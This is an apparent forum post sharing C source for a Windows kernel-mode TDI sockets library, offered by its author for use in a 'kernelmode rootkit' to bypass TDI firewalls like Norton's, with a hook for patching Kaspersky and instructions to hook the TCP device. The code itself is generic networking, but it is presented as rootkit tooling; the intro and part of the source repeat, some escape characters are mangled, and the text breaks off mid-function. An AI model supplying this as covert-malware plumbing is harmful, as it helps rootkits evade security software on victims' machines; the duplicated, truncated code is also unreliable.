By: valerino Kernel mode sockets library
It's my birthday today (just turned 31 the 31st december, funny eh ?!), i wanted to publish something,
it makes me feel alive. Christ lived 33 years only, if i'd be the new Christ
i've only 2 years left, so better to share my knowledge now :)
Well, here you have a fully functional TDI sockets library. You can connect,
send, receive, all from your supa-dupa-l333t kernelmode rootkit. Yes, you can
bypass lame TDI firewalls with this. No, you can't bypass ndis firewalls.
(read : you can bypass norton's firewall).
Consider that something like this worths $400+ from PCAUSA, and maybe more
from OSR (KSOCKS)..... enough for a new year's present :)
Usage : you have to hook //device/tcp yourself and set the global variable TcpIpDevice.
Then call KSocketInitialize and you're done. Refer to the source for usage.... it shouldn't be hard.
have fun, and happy 2006 to everyone ! Ciao! :)
-----------------------------------------sockets.c------------------------------
//************************************************************************
//
// sockets.c
// (c) valerino/xOANINO 2003/2004/2005
//
// this module implements a generic kernel sockets library.
// ** Beware that this is optimized for single thread use if REUSE_SOCKETSIRP is defined.**
//*****************************************************************************
#include "ntifs.h"
#define MODULE "**SOCKETS**"
#ifdef DBG
#ifdef NO_SOCKETS_DBGMSG
#undef KDebugPrint
#define KDebugPrint(DbgLevel,_x)
#endif
#endif
/************************************************************************/
// BOOL KSocketInitialize()
//
// Initialize kernelsockets library
//
/************************************************************************/
BOOL KSocketInitialize()
{
ExInitializePagedLookasideList(&LookasideSocketMem, NULL, NULL, 0, 1024, 'lskN', 0);
ExInitializePagedLookasideList(&LookasideSocket,NULL,NULL,0,sizeof (KSOCKET),'cosN',0);
#ifdef REUSE_SOCKETSIRP
// check for tcpdevice
if (!TcpIpDevice)
return TRUE;
// allocate the single irp we use throughout the sockets library
SocketsIrp = IoAllocateIrp(TcpIpDevice->StackSize + 1, FALSE);
if (!SocketsIrp)
return FALSE;
#endif
return TRUE;
}
/************************************************************************/
// PVOID KSocketAllocatePool(VOID)
//
// Allocate memory from sockets lookaside
//
/************************************************************************/
PVOID KSocketAllocatePool(VOID)
{
PCHAR p = NULL;
p = ExAllocateFromPagedLookasideList(&LookasideSocketMem);
if (p)
memset(p, 0, SMALLBUFFER_SIZE);
return p;
}
/************************************************************************/
// void KSocketFreePool(PVOID pBuffer)
//
// Free memory to sockets lookaside
//
/************************************************************************/
void KSocketFreePool(PVOID pBuffer)
{
ExFreeToPagedLookasideList(&LookasideSocketMem, pBuffer);
}
/************************************************************************/
// NTSTATUS KSocketCloseObject(HANDLE Handle, PFILE_OBJECT FileObject)
//
// Release a socket object
//
/************************************************************************/
NTSTATUS KSocketCloseObject(HANDLE Handle, PFILE_OBJECT FileObject)
{
NTSTATUS Status = STATUS_SUCCESS;
// dereference referenced object (called for connection and address)
if (FileObject)
ObDereferenceObject(FileObject);
// close socket
if (Handle)
Status = ZwClose(Handle);
return Status;
}
/************************************************************************/
// PFILE_FULL_EA_INFORMATION KSocketBuildEaValues(PVOID EaName, ULONG NameLength, PVOID EaValue,
// ULONG ValueLength, PULONG EaLength)
//
// Build EA information for the socket object
//
/************************************************************************/
PFILE_FULL_EA_INFORMATION KSocketBuildEaValues(PVOID EaName, ULONG NameLength, PVOID EaValue,
ULONG ValueLength, PULONG EaLength)
{
PFILE_FULL_EA_INFORMATION Ea;
*EaLength = FIELD_OFFSET(FILE_FULL_EA_INFORMATION, EaName[0]) + NameLength + 1 + ValueLength;
// allocate ea buffer
Ea = ExAllocatePool(PagedPool, *EaLength);
if (!Ea)
return NULL;
// fill buffer with EA values requested
Ea->NextEntryOffset = 0;
Ea->Flags = 0;
Ea->EaNameLength = (UCHAR) NameLength;
Ea->EaValueLength = (USHORT) ValueLength;
memcpy (Ea->EaName,EaName,Ea->EaNameLength + 1);
if (EaValue && EaLength)
memcpy (&Ea->EaName[NameLength + 1],EaValue,ValueLength);
return Ea;
}
/************************************************************************/
// NTSTATUS KSocketOpenAddress(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
//
// Open address
//
/************************************************************************/
NTSTATUS KSocketOpenAddress(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
{
UNICODE_STRING Name;
OBJECT_ATTRIBUTES ObjectAttributes;
PFILE_FULL_EA_INFORMATION Ea = NULL;
ULONG EaLength;
IO_STATUS_BLOCK Iosb;
NTSTATUS Status;
TA_IP_ADDRESS Sin;
// initialize address
Sin.TAAddressCount = 1;
Sin.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
Sin.Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
Sin.Address[0].Address[0].sin_port = 0; // INADDR_ANY;
Sin.Address[0].Address[0].in_addr = 0;
// get EA values for address
Ea = KSocketBuildEaValues(TdiTransportAddress, TDI_TRANSPORT_ADDRESS_LENGTH, &Sin,
sizeof(TA_IP_ADDRESS), &EaLength);
if (!Ea)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
// open tcp device
RtlInitUnicodeString(&Name, TCPIP_DEVICE);
InitializeObjectAttributes(&ObjectAttributes, &Name, OBJ_CASE_INSENSITIVE, NULL, 0);
Status = ZwCreateFile(Handle, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &ObjectAttributes, &Iosb, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,FILE_OPEN_IF,0, Ea, EaLength);
if (!NT_SUCCESS(Status))
goto __exit;
Status = ObReferenceObjectByHandle(*Handle, FILE_ANY_ACCESS, 0, KernelMode, FileObject, NULL);
__exit:
if (Ea)
ExFreePool(Ea);
return Status;
}
/************************************************************************/
// NTSTATUS KSocketOpenConnection(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
//
// open connection
//
/************************************************************************/
NTSTATUS KSocketOpenConnection(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
{
UNICODE_STRING Name;
OBJECT_ATTRIBUTES ObjectAttributes;
PFILE_FULL_EA_INFORMATION Ea = NULL;
ULONG EaLength;
IO_STATUS_BLOCK Iosb;
NTSTATUS Status;
// get EA values for connection
Ea = KSocketBuildEaValues(TdiConnectionContext, TDI_CONNECTION_CONTEXT_LENGTH, &Context,
sizeof(PKSOCKET), &EaLength);
if (!Ea)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
// open tcp device
RtlInitUnicodeString(&Name, TCPIP_DEVICE);
InitializeObjectAttributes(&ObjectAttributes, &Name, OBJ_CASE_INSENSITIVE, NULL, 0);
Status = ZwCreateFile(Handle, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &ObjectAttributes, &Iosb, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,FILE_OPEN_IF, 0, Ea, EaLength);
if (!NT_SUCCESS(Status))
goto __exit;
Status = ObReferenceObjectByHandle(*Handle, FILE_ANY_ACCESS, 0, KernelMode, FileObject, NULL);
__exit:
if (Ea)
ExFreePool(Ea);
return Status;
}
//************************************************************************
// NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
//
// Socket completion routine
//************************************************************************/
NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
PMDL mdl = NULL;
PMDL nextMdl = NULL;
PKSOCKET_CTX Ctx = (PKSOCKET_CTX)Context;
// set status block
Ctx->Iosb.Status = Irp->IoStatus.Status;
Ctx->Iosb.Information = Irp->IoStatus.Information;
// Free any associated MDL.
if (Irp->MdlAddress != NULL)
{
for (mdl = Irp->MdlAddress; mdl != NULL; mdl = nextMdl)
{
nextMdl = mdl->Next;
MmUnlockPages(mdl);
// This function will also unmap pages.
IoFreeMdl(mdl);
}
// set mdl address to null, to prevent iofreeirp to attempt to free it again
Irp->MdlAddress = NULL;
}
#ifdef REUSE_SOCKETSIRP
// set irp for reuse
IoReuseIrp (Irp,STATUS_SUCCESS);
#else
// free irp
IoFreeIrp (Irp);
#endif
// set event
if (Ctx)
KeSetEvent (&Ctx->Event,IO_NO_INCREMENT,FALSE);
return STATUS_MORE_PROCESSING_REQUIRED;
}
//************************************************************************
// NTSTATUS KSocketAssociateAddress(HANDLE Address, PFILE_OBJECT Connection)
//
// Associate address
//************************************************************************/
NTSTATUS KSocketAssociateAddress(HANDLE Address, PFILE_OBJECT Connection)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_ASSOCIATE_ADDRESS irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build irp (this set completion routine too)
TdiBuildAssociateAddress(Irp, DeviceObject, Connection,KSocketComplete, &Ctx, Address);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketAssociateAddress timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
return Status;
}
//************************************************************************
// NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port)
//
// Connect socket to address:port
//************************************************************************/
NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
TDI_CONNECTION_INFORMATION RequestInfo;
TA_IP_ADDRESS RemoteAddress;
PFILE_OBJECT Connection;
KDebugPrint (2,("%s KSocketConnect called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
memset (&RequestInfo,0, sizeof(TDI_CONNECTION_INFORMATION));
memset (&RemoteAddress,0,sizeof (TA_IP_ADDRESS));
RemoteAddress.TAAddressCount = 1;
RemoteAddress.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
RemoteAddress.Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
RemoteAddress.Address[0].Address[0].sin_port = Port;
RemoteAddress.Address[0].Address[0].in_addr = Address;
RequestInfo.UserDataLength = 0;
RequestInfo.UserData = NULL;
RequestInfo.OptionsLength = 0;
RequestInfo.Options = NULL;
RequestInfo.RemoteAddressLength = sizeof(TA_IP_ADDRESS);
RequestInfo.RemoteAddress = &RemoteAddress;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_CONNECT irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
// build irp (this set completion routine too)
TdiBuildConnect (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,NULL, &RequestInfo,&RequestInfo);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketConnect timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
// ok
Status = Ctx.Iosb.Status;
}
if (Status == STATUS_SUCCESS)
pSocket->Connected = TRUE;
return Status;
}
//************************************************************************
// NTSTATUS KSocketDisconnect(PKSOCKET pSocket
//
// Disconnect socket
//************************************************************************/
NTSTATUS KSocketDisconnect(PKSOCKET pSocket)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
TDI_CONNECTION_INFORMATION ReqDisconnect;
PFILE_OBJECT Connection;
ULONG Flags;
KSOCKET_CTX Ctx;
// check if socket is already disconnected
if (!pSocket)
return STATUS_UNSUCCESSFUL;
if (!pSocket->Connected)
return STATUS_ALREADY_DISCONNECTED;
// set parameters
Connection = pSocket->ConnectionFile;
memset(&ReqDisconnect,0,sizeof (TDI_CONNECTION_INFORMATION));
Flags = TDI_DISCONNECT_ABORT;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_DISCONNECT irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build irp (this set completion routine too)
TdiBuildDisconnect (Irp, DeviceObject,Connection,KSocketComplete, &Ctx, NULL,Flags,&ReqDisconnect,&ReqDisconnect);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketDisconnect timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
if (NT_SUCCESS (Status))
pSocket->Connected = FALSE;
return Status;
}
//************************************************************************
// NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesSent)
//
// Send buffer thru socket
//************************************************************************/
NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesSent)
{
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT Connection;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
PMDL Mdl;
KDebugPrint (2,("%s KSocketSend called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
*BytesSent = 0;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_SEND irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build mdl
Mdl = IoAllocateMdl(Buffer, Size, FALSE, FALSE, NULL);
if (!Mdl)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
IoFreeIrp (Irp);
return Status;
}
__try
{
MmProbeAndLockPages(Mdl, KernelMode, IoReadAccess);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
IoFreeMdl (Mdl);
IoFreeIrp (Irp);
Status = STATUS_UNSUCCESSFUL;
return Status;
}
Mdl->Next = NULL;
// build irp (this set completion routine too)
TdiBuildSend (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,Mdl,0,Size);
// call tcp
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketSend timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
// return sent bytes
*BytesSent = Ctx.Iosb.Information;
// check transferred bytes
if (Ctx.Iosb.Information != Size)
Status = STATUS_CONNECTION_ABORTED;
if (!NT_SUCCESS(Status))
{
KDebugPrint(1, ("%s KSocketSend returned error %08x (ReqSent:%d,OkSent:%d)/n", MODULE, Status,
Size, *BytesSent));
}
return Status;
}
//************************************************************************
// NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived, BOOLEAN ReceivePeek)
//
// Receive buffer thru socket
//************************************************************************/
NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived, BOOLEAN ReceivePeek)
{
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT Connection;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
PMDL Mdl;
ULONG Flags;
KSOCKET_CTX Ctx;
KDebugPrint (2,("%s KSocketReceive called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
*BytesReceived = 0;
if (ReceivePeek)
Flags = TDI_RECEIVE_PEEK;
else
Flags = TDI_RECEIVE_NORMAL;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_RECEIVE irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build mdl
Mdl = IoAllocateMdl(Buffer, Size, FALSE, FALSE, NULL);
if (!Mdl)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
IoFreeIrp (Irp);
return Status;
}
__try
{
MmProbeAndLockPages(Mdl, KernelMode, IoWriteAccess);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
IoFreeMdl (Mdl);
IoFreeIrp (Irp);
Status = STATUS_UNSUCCESSFUL;
return Status;
}
Mdl->Next = NULL;
// build irp (this set completion routine too)
TdiBuildReceive (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,Mdl,Flags,Size);
// call tcp
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketReceive timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
// return received bytes
*BytesReceived = Ctx.Iosb.Information;
// check received bytes
if (Ctx.Iosb.Information == 0)
Status = STATUS_CONNECTION_ABORTED;
if (!NT_SUCCESS(Status))
{
KDebugPrint(1, ("%s KSocketReceive returned error %08x (ReqRecv:%d,OkRecv:%d)/n", MODULE, Status,
Size, *BytesReceived));
}
return Status;
}
//************************************************************************
// VOID KSocketClose(PKSOCKET Socket)
//
// Close socket and Release socket memory
//************************************************************************/
VOID KSocketClose(PKSOCKET Socket)
{
if (Socket == NULL)
{
return;
}
KSocketCloseObject(Socket->TransportAddressHandle, Socket->TransportAddress);
KSocketCloseObject(Socket->ConnectionFileHandle, Socket->ConnectionFile);
ExFreeToPagedLookasideList (&LookasideSocket,Socket);
Socket = NULL;
}
//************************************************************************
// NTSTATUS KSocketCreate(OUT PKSOCKET* Socket)
//
// Create socket
//************************************************************************/
NTSTATUS KSocketCreate(OUT PKSOCKET* Socket)
{
NTSTATUS Status = STATUS_SUCCESS;
PKSOCKET iSocket = NULL;
#ifdef ALWAYS_DISABLESOCKETS
KDebugPrint(1,("%s Sockets disabled, connect skipped./n", MODULE));
return STATUS_UNSUCCESSFUL;
#endif
// check disabled sockets
if (DisableSockets)
{
KDebugPrint(1,("%s Sockets disabled, connect skipped./n", MODULE));
return STATUS_UNSUCCESSFUL;
}
// handle KAV (crash if not patched)
ModulePatchKAV();
// allocate memory for a new socket
iSocket = ExAllocateFromPagedLookasideList(&LookasideSocket);
if (!iSocket)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
memset (iSocket,0, sizeof(KSOCKET));
// open transport address
Status = KSocketOpenAddress(&iSocket->TransportAddressHandle, &iSocket->TransportAddress,
iSocket);
if (!NT_SUCCESS(Status))
goto __exit;
// create connection endpoint
Status = KSocketOpenConnection(&iSocket->ConnectionFileHandle, &iSocket->ConnectionFile,
iSocket);
if (!NT_SUCCESS(Status))
goto __exit;
// associate address with connection
Status = KSocketAssociateAddress(iSocket->TransportAddressHandle, iSocket->ConnectionFile);
if (!NT_SUCCESS(Status))
goto __exit;
__exit:
if (!NT_SUCCESS(Status))
{
if (iSocket)
KSocketClose(iSocket);
*Socket = NULL;
}
else
*Socket = iSocket;
return Status;
}
/************************************************************************/
// NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes)
//
// Read line (ascii) from network
//
/************************************************************************/
NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes)
{
NTSTATUS Status = STATUS_UNSUCCESSFUL;
UCHAR c = 0;
ULONG i = 0;
ULONG received = 0;
// check params
if (!pSocket || !buf || !ReceivedBytes || !maxlen)
goto __exit;
*ReceivedBytes = 0;
if (!pSocket->Connected)
goto __exit;
// read line char by char, and stop at EOL
memset (buf, 0, maxlen);
while (TRUE)
{
if (i == maxlen)
break;
// get char from socket
Status = KSocketReceive (pSocket,&c,1,&received,FALSE);
if (!NT_SUCCESS (Status) || received == 0)
break;
// write char into buffer and advance
*buf = c;
buf++;
i++;
// check for EOL
if (c == '/n')
{
*ReceivedBytes = i;
break;
}
}
__exit:
// treat 0 size received as error
if (received == 0)
Status = STATUS_NO_DATA_DETECTED;
return Status;
}
/************************************************************************/
// NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...)
//
// write formatted line (ascii) to network
//
/************************************************************************/
NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...)
{
va_list ap;
char* buf;
ULONG len;
NTSTATUS Status;
SIZE_T BytesSent = 0;
// allocate memory
buf = KSocketAllocatePool();
if (!buf)
return STATUS_INSUFFICIENT_RESOURCES;
// build line
va_start(ap, format);
_vsnprintf(buf, SMALLBUFFER_SIZE, format, ap);
va_end(ap);
len = strlen(buf);
// send
Status = KSocketSend(pSocket, buf, len, &BytesSent);
// free buffer
KSocketFreePool(buf);
// check if we've sent all bytes
if (BytesSent < len)
return STATUS_UNSUCCESSFUL;
return Status;
}
-----------------------------------------sockets.h------------------------------
#ifndef __sockets_h__
#define __sockets_h__
#define REUSE_SOCKETSIRP
// debugprint with debuglevel (if dbglevel == debug level, it triggers)
#if DBG
#define KDebugPrint(DbgLevel,_x) { /
if (DbgLevel == DEBUG_LEVEL)
{
DbgPrint _x;
}
}
#else
#define KDebugPrint(DbgLevel,_x)
#endif //DBG
//#define ALWAYS_DISABLESOCKETS
//************************************************************************
// kernel sockets
//
//************************************************************************/
PDEVICE_OBJECT TcpIpDevice;
typedef struct __tagKSOCKET
{
PFILE_OBJECT TransportAddress;
HANDLE TransportAddressHandle;
PFILE_OBJECT ConnectionFile;
HANDLE ConnectionFileHandle;
BOOLEAN Connected;
}KSOCKET, * PKSOCKET;
typedef struct _tagKSOCKET_CTX {
KEVENT Event;
IO_STATUS_BLOCK Iosb;
} KSOCKET_CTX, *PKSOCKET_CTX;
PAGED_LOOKASIDE_LIST LookasideSocketMem;
PAGED_LOOKASIDE_LIST LookasideSocket;
KEVENT NoNetworkFailures;
BOOLEAN DisableSockets; // flag to disable sockets if needed
PDRIVER_DISPATCH OriginalTcpInternalDeviceControl;
PIRP SocketsIrp;
// all paged code except the completion routine
BOOL KSocketInitialize();
#pragma alloc_text (PAGEboom,KSocketInitialize)
NTSTATUS KSocketCreate(OUT PKSOCKET* Socket);
VOID KSocketClose(PKSOCKET Socket);
PVOID KSocketAllocatePool();
void KSocketFreePool(PVOID pBuffer);
NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size,
PSIZE_T BytesSent);
NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port);
NTSTATUS KSocketDisconnect(PKSOCKET pSocket);
NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived,
BOOLEAN ReceivePeek);
NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes);
NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...);
#endif // __sockets_h__
It's my birthday today (just turned 31 the 31st december, funny eh ?!), i wanted to publish something,
it makes me feel alive. Christ lived 33 years only, if i'd be the new Christ
i've only 2 years left, so better to share my knowledge now :)
Well, here you have a fully functional TDI sockets library. You can connect,
send, receive, all from your supa-dupa-l333t kernelmode rootkit. Yes, you can
bypass lame TDI firewalls with this. No, you can't bypass ndis firewalls.
(read : you can bypass norton's firewall).
Consider that something like this worths $400+ from PCAUSA, and maybe more
from OSR (KSOCKS)..... enough for a new year's present :)
Usage : you have to hook //device/tcp yourself and set the global variable TcpIpDevice.
Then call KSocketInitialize and you're done. Refer to the source for usage.... it shouldn't be hard.
have fun, and happy 2006 to everyone ! Ciao! :)
-----------------------------------------sockets.c------------------------------
//************************************************************************
//
// sockets.c
// (c) valerino/xOANINO 2003/2004/2005
//
// this module implements a generic kernel sockets library.
// ** Beware that this is optimized for single thread use if REUSE_SOCKETSIRP is defined.**
//*****************************************************************************
#include "ntifs.h"
#define MODULE "**SOCKETS**"
#ifdef DBG
#ifdef NO_SOCKETS_DBGMSG
#undef KDebugPrint
#define KDebugPrint(DbgLevel,_x)
#endif
#endif
/************************************************************************/
// BOOL KSocketInitialize()
//
// Initialize kernelsockets library
//
/************************************************************************/
BOOL KSocketInitialize()
{
ExInitializePagedLookasideList(&LookasideSocketMem, NULL, NULL, 0, 1024, 'lskN', 0);
ExInitializePagedLookasideList(&LookasideSocket,NULL,NULL,0,sizeof (KSOCKET),'cosN',0);
#ifdef REUSE_SOCKETSIRP
// check for tcpdevice
if (!TcpIpDevice)
return TRUE;
// allocate the single irp we use throughout the sockets library
SocketsIrp = IoAllocateIrp(TcpIpDevice->StackSize + 1, FALSE);
if (!SocketsIrp)
return FALSE;
#endif
return TRUE;
}
/************************************************************************/
// PVOID KSocketAllocatePool(VOID)
//
// Allocate memory from sockets lookaside
//
/************************************************************************/
PVOID KSocketAllocatePool(VOID)
{
PCHAR p = NULL;
p = ExAllocateFromPagedLookasideList(&LookasideSocketMem);
if (p)
memset(p, 0, SMALLBUFFER_SIZE);
return p;
}
/************************************************************************/
// void KSocketFreePool(PVOID pBuffer)
//
// Free memory to sockets lookaside
//
/************************************************************************/
void KSocketFreePool(PVOID pBuffer)
{
ExFreeToPagedLookasideList(&LookasideSocketMem, pBuffer);
}
/************************************************************************/
// NTSTATUS KSocketCloseObject(HANDLE Handle, PFILE_OBJECT FileObject)
//
// Release a socket object
//
/************************************************************************/
NTSTATUS KSocketCloseObject(HANDLE Handle, PFILE_OBJECT FileObject)
{
NTSTATUS Status = STATUS_SUCCESS;
// dereference referenced object (called for connection and address)
if (FileObject)
ObDereferenceObject(FileObject);
// close socket
if (Handle)
Status = ZwClose(Handle);
return Status;
}
/************************************************************************/
// PFILE_FULL_EA_INFORMATION KSocketBuildEaValues(PVOID EaName, ULONG NameLength, PVOID EaValue,
// ULONG ValueLength, PULONG EaLength)
//
// Build EA information for the socket object
//
/************************************************************************/
PFILE_FULL_EA_INFORMATION KSocketBuildEaValues(PVOID EaName, ULONG NameLength, PVOID EaValue,
ULONG ValueLength, PULONG EaLength)
{
PFILE_FULL_EA_INFORMATION Ea;
*EaLength = FIELD_OFFSET(FILE_FULL_EA_INFORMATION, EaName[0]) + NameLength + 1 + ValueLength;
// allocate ea buffer
Ea = ExAllocatePool(PagedPool, *EaLength);
if (!Ea)
return NULL;
// fill buffer with EA values requested
Ea->NextEntryOffset = 0;
Ea->Flags = 0;
Ea->EaNameLength = (UCHAR) NameLength;
Ea->EaValueLength = (USHORT) ValueLength;
memcpy (Ea->EaName,EaName,Ea->EaNameLength + 1);
if (EaValue && EaLength)
memcpy (&Ea->EaName[NameLength + 1],EaValue,ValueLength);
return Ea;
}
/************************************************************************/
// NTSTATUS KSocketOpenAddress(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
//
// Open address
//
/************************************************************************/
NTSTATUS KSocketOpenAddress(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
{
UNICODE_STRING Name;
OBJECT_ATTRIBUTES ObjectAttributes;
PFILE_FULL_EA_INFORMATION Ea = NULL;
ULONG EaLength;
IO_STATUS_BLOCK Iosb;
NTSTATUS Status;
TA_IP_ADDRESS Sin;
// initialize address
Sin.TAAddressCount = 1;
Sin.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
Sin.Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
Sin.Address[0].Address[0].sin_port = 0; // INADDR_ANY;
Sin.Address[0].Address[0].in_addr = 0;
// get EA values for address
